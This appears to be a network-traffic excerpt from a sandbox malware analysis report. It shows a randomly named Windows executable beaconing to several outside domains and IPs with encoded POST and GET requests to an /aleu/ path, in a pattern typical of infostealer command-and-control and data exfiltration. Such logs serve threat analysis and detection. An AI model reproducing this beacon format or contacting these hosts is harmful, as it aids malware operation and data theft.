                                                                                                                                                                                                        Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://x3nadr4oqr3b20ld.app" + "?p="+window.location.pathname + window.location.search.replace(
May 8, 2024 18:21:53.217915058 CEST | 6 | OUT | Data Raw: 47
Data Ascii: G
May 8, 2024 18:22:05.827423096 CEST | 6 | OUT | Data Raw: 45
Data Ascii: E
May 8, 2024 18:22:27.075176001 CEST | 6 | OUT | Data Raw: 54
Data Ascii: T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49757 | 178.211.137.59 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:21:51.727742910 CEST | 757 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.skibinscy-finanse.pl
Origin: http://www.skibinscy-finanse.pl
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cache-Control: max-age=0
Connection: close
Referer: http://www.skibinscy-finanse.pl/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=A2HY+qJBKj/mIfobayrybI/emvppO0x1xd982VnsYL+x3WasAuqToKj7nA66WMLJam2FyqzsJJxvdwuz0iYiV9GwevcDM4XecIAgKDHxGRBnn+6Lj2VTP958Oxgqb2Tijub6M9WBlrN0QRl9eaDJLQIhMeNfAC/hck+ZYXHZR65IloLw2hzm/YVliZJ9agyPeQ==
May 8, 2024 18:21:52.061665058 CEST | 360 | IN | HTTP/1.1 404 Not Found
Date: Wed, 08 May 2024 16:21:51 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49758 | 178.211.137.59 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:21:54.616086960 CEST | 777 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.skibinscy-finanse.pl
Origin: http://www.skibinscy-finanse.pl
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Cache-Control: max-age=0
Connection: close
Referer: http://www.skibinscy-finanse.pl/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+ux33qsSsCTvKj7gw67SML0amqryrfsJNZvdx+z01EjVtG2WPc7BYXecIAgKDCmGR5nmNSLiTpQRN59PxgqRWTmjubIM/jUlpF0QT99eLDGBQInIeMTGSXxZVLuaHnmSOtXkuaqnQSxtYxW/eAJXjPGFUtSWA/PxNSh8cIJmq4fAQs=
May 8, 2024 18:21:54.953469038 CEST | 360 | IN | HTTP/1.1 404 Not Found
Date: Wed, 08 May 2024 16:21:54 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49759 | 178.211.137.59 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:21:59.315776110 CEST | 10859 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.skibinscy-finanse.pl
Origin: http://www.skibinscy-finanse.pl
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
Cache-Control: max-age=0
Connection: close
Referer: http://www.skibinscy-finanse.pl/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 8, 2024 18:21:59.653203964 CEST | 360 | IN | HTTP/1.1 404 Not Found
Date: Wed, 08 May 2024 16:21:59 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49760 | 178.211.137.59 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:02.183176041 CEST | 485 | OUT | GET /aleu/?jn4lNb=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&jvudu=jXz4lVThP2GL4N HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.skibinscy-finanse.pl
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 8, 2024 18:22:02.518805981 CEST | 360 | IN | HTTP/1.1 404 Not Found
Date: Wed, 08 May 2024 16:22:02 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49761 | 203.161.46.103 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:17.127955914 CEST | 736 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Origin: http://www.fairmarty.top
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=4GbMTgr0j9lSLwJ9EDNHlK6XhU7AkA37CXuHH8yDybIl1848QM4KgCgcfbCzFnYUXnPfT0HqTXIRFb1+dv+cKfZHQJM1HqBNqOdu8oWvdjScbNhatylZcggDmrHg4aDtoKVNt3YjVMNirNla3+TmJGLYXb1FrQzhDs+KcU9huSg/khjHEjq2qdpO+AKjmjmLzg==
May 8, 2024 18:22:17.342128038 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:17 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49762 | 203.161.46.103 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:19.862302065 CEST | 756 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Origin: http://www.fairmarty.top
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypsl1dI8TN4KuigcV7D5BnYKXgH9T17qTXMRFex+dfCbLPZBbpMzaaBNqOdu8oSBdjKcb9RatQMPSAhxxbHgy6DpoKVjtzQFVP1irM1a3rmwDGLeTb0KnQW4H/XlXW0PvxUbsHydVSLh4dN9jHDXrgbCohwDCRcOpOI/1ipRocn6Q00=
May 8, 2024 18:22:20.073838949 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:19 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49763 | 203.161.46.103 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:22.601840019 CEST | 10838 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Origin: http://www.fairmarty.top
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Data Ascii: jn4lNb= [TRUNCATED]
May 8, 2024 18:22:22.813817978 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:22 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49764 | 203.161.46.103 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:25.343188047 CEST | 478 | OUT | GET /aleu/?jn4lNb=1EzsQVnX0vVrGxBbRnBPuNOP8Hn1gSvJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpU5xNXvMTIPZOnLFq5OOndh66TdA/sgsdPCY=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 8, 2024 18:22:25.554493904 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:25 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49765 | 162.240.81.18 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:40.700539112 CEST | 748 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Origin: http://www.aprovapapafox.com
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=rGJQ2I+FOOukznvK4UomL/Q+RE296L1uzb4KXnnQYb68hcvFWqdN5gEF1778QoEMkUGNNNVnAjCZz+7lpkr1WIRrAiuaxN9HiNWRWh7mFYjkF1t/va9N0ILdvgznzgjO+w8IpHrSq/PJpIYINGANJQSftSRDy/N3NjNBowCLwUj2+KyYuXTeqT7/b5apHGWixQ==
May 8, 2024 18:22:40.900969982 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:40 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 8, 2024 18:22:40.901010036 CEST | 1289 | IN
                                                                                                                                                                                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 8, 2024 18:22:40.901026011 CEST | 1245 | IN
                                                                                                                                                                                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49766 | 162.240.81.18 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:43.424587011 CEST | 768 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Origin: http://www.aprovapapafox.com
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Ascii: jn4lNb=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpe8m4rFEupN+gEFhL7DUoELkUKFNMZnAjmZz6/lpTf2QYR1ICuU8t9HiNWRWgfMFbTkCEd/u79M1ILCugznlQjK+w8upDL0q5DJpJoINS0KDQSZgyQKyP4SEW4zmCqY4UmL2sjC/myJ4TfMG+TdKFrrqaiEda7YS935To3iT9U6s1Y=
May 8, 2024 18:22:43.626117945 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:43 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 8, 2024 18:22:43.626131058 CEST | 1289 | IN
                                                                                                                                                                                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 8, 2024 18:22:43.626147985 CEST | 1245 | IN
                                                                                                                                                                                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49767 | 162.240.81.18 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:46.160737991 CEST | 10850 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Origin: http://www.aprovapapafox.com
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Data Ascii: jn4lNb= [TRUNCATED]
May 8, 2024 18:22:46.362932920 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:46 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 8, 2024 18:22:46.363004923 CEST | 1289 | IN
                                                                                                                                                                                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 8, 2024 18:22:46.363018990 CEST | 1245 | IN
                                                                                                                                                                                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49768 | 162.240.81.18 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:48.893764973 CEST | 482 | OUT | GET /aleu/?jn4lNb=mEhw182mTcvL4X7VmCJbLa0KRk630JMb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5Fv1lORSZ/ddJgsC5cmTGFrP+D2MWmLQXjoE=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 8, 2024 18:22:49.095360994 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:48 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 8, 2024 18:22:49.095375061 CEST | 1289 | IN | Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 8, 2024 18:22:49.095386982 CEST | 1245 | IN | Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49769 | 103.93.125.69 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 18:22:55.613598108 CEST | 721 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.83634.cn
                                                                                                                                                                                                        Origin: http://www.83634.cn
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.83634.cn/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
